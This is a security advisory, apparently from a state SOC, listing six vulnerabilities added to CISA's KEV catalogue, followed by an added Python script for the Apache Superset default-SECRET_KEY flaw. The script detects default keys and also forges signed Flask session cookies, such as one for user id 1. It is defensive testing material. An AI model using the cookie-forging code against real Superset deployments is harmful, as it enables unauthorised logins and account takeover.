CISA Updates Known Exploited Vulnerabilities Catalog - 20240109002
Overview
CISA has added six vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog.
What is vulnerable?
CVE | Product(s) affected | Summary | Severity | CVSS |
---|---|---|---|---|
CVE-2023-38203 | Adobe ColdFusion 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) | Deserialization of untrusted data that could result in arbitrary code execution. Exploitation does not require user interaction. | Critical | 9.8 |
CVE-2023-29300 | Adobe ColdFusion 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) | Deserialization of untrusted data that could result in arbitrary code execution. Exploitation does not require user interaction. | Critical | 9.8 |
CVE-2023-27524 | Apache Superset versions up to and including 2.0.1 | Session validation attack. Installations that have not changed the default SECRET_KEY as the installation instructions require allow an attacker to sign their own session, authenticate and access unauthorized resources. Administrators who have changed the default SECRET_KEY are not affected. | Critical | 9.8 |
CVE-2023-41990 | Apple tvOS before 16.2; iOS and iPadOS before 16.2 and before 15.7.7; macOS Monterey before 12.6.7, Big Sur before 11.7.8 and Ventura before 13.1; watchOS before 9.2 | Processing a font file may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1. | High | 7.8 |
CVE-2016-20017 | D-Link DSL-2750B devices before firmware 1.05 | Remote unauthenticated command injection via the cli parameter of login.cgi; exploited in the wild from 2016 through 2022. | Critical | 9.8 |
CVE-2023-23752 | Joomla! 4.0.0 through 4.2.7 | An improper access check allows unauthorized access to web service (API) endpoints. | Medium | 5.3 |
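The Apache Superset entry hinges on a default Flask SECRET_KEY: anyone who knows the key can sign their own session cookie and the server will accept it. The script below is added here as a worked check; it is not part of the WA SOC advisory or the Superset project. It re-implements the Flask session-cookie signing scheme (itsdangerous URLSafeTimedSerializer with salt "cookie-session", HMAC-SHA1 key derivation) using only the standard library, so a session cookie captured from your own Superset instance can be tested against a list of candidate default keys. The key list is an assumption drawn from Superset's shipped configuration files and public research on CVE-2023-27524 and should be checked against the version you run; the sample session payload is constructed for the demonstration.

```python
"""Check whether a Flask/Superset session cookie validates under a known default SECRET_KEY.

Added example for CVE-2023-27524 (not from the WA SOC advisory or the Apache Superset
project). Re-implements the Flask session-cookie signing scheme with the standard library.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Iterable, Optional

# Candidate default keys: ASSUMED from Superset's config.py / docker config files and
# public CVE-2023-27524 research. Verify against the version you actually run.
DEFAULT_SECRET_KEYS = [
    "\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h",   # historic config.py default
    "CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",           # later config.py placeholder
    "thisISaSECRET_1234",                             # docker dev superset_config.py
    "YOUR_OWN_RANDOM_GENERATED_SECRET_KEY",           # documentation placeholder
    "TEST_NON_DEV_SECRET",                            # docker non-dev env file
]

SALT = b"cookie-session"  # Flask's fixed salt for session cookies


def _b64encode(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _b64decode(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derive_key(secret_key: str) -> bytes:
    # itsdangerous key_derivation="hmac": HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode("utf-8"), SALT, hashlib.sha1).digest()


def sign_session(payload: dict, secret_key: str, timestamp: Optional[int] = None) -> str:
    """Produce a session cookie for `payload` exactly as Flask signs it under `secret_key`."""
    body = json.dumps(payload, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(body)
    if len(compressed) < len(body) - 1:          # itsdangerous compresses if it pays off
        payload_b64 = b"." + _b64encode(compressed)
    else:
        payload_b64 = _b64encode(body)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = _b64encode(ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big"))
    value = payload_b64 + b"." + ts_b64            # signature covers payload AND timestamp
    sig = _b64encode(hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest())
    return (value + b"." + sig).decode()


def verify_session(cookie: str, secret_key: str) -> Optional[dict]:
    """Return the decoded session dict if `cookie` was signed with `secret_key`, else None."""
    try:
        value, sig = cookie.encode().rsplit(b".", 1)
        expected = hmac.new(_derive_key(secret_key), value, hashlib.sha1).digest()
        if not hmac.compare_digest(_b64decode(sig), expected):
            return None
        payload_b64, _ts = value.rsplit(b".", 1)
        if payload_b64.startswith(b"."):         # compressed payload marker
            body = zlib.decompress(_b64decode(payload_b64[1:]))
        else:
            body = _b64decode(payload_b64)
        return json.loads(body)
    except (ValueError, zlib.error):             # malformed cookie: treat as not verified
        return None


def find_default_key(cookie: str, candidates: Iterable[str] = DEFAULT_SECRET_KEYS) -> Optional[str]:
    """Return the first candidate SECRET_KEY that validates `cookie`, or None if none does."""
    for key in candidates:
        if verify_session(cookie, key) is not None:
            return key
    return None


if __name__ == "__main__":
    # Constructed demo: a Flask-Login style session for user id 1, signed with a default key.
    forged = sign_session({"_user_id": "1"}, DEFAULT_SECRET_KEYS[1])
    print("cookie:", forged)
    print("signed with default key:", find_default_key(forged))
    # Replace `forged` with the `session` cookie from your own instance to test it.
```

To test a live instance, log in normally, copy the `session` cookie value and pass it to `find_default_key`; a non-None result means the deployment is exploitable and SECRET_KEY must be rotated (which invalidates all existing sessions). Use `sign_session` only against systems you are authorised to test.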
Recommendation
The WA SOC recommends administrators apply the solutions as per vendor instructions to all affected devices within the expected timeframe of 48 hours... (refer to Patch Management):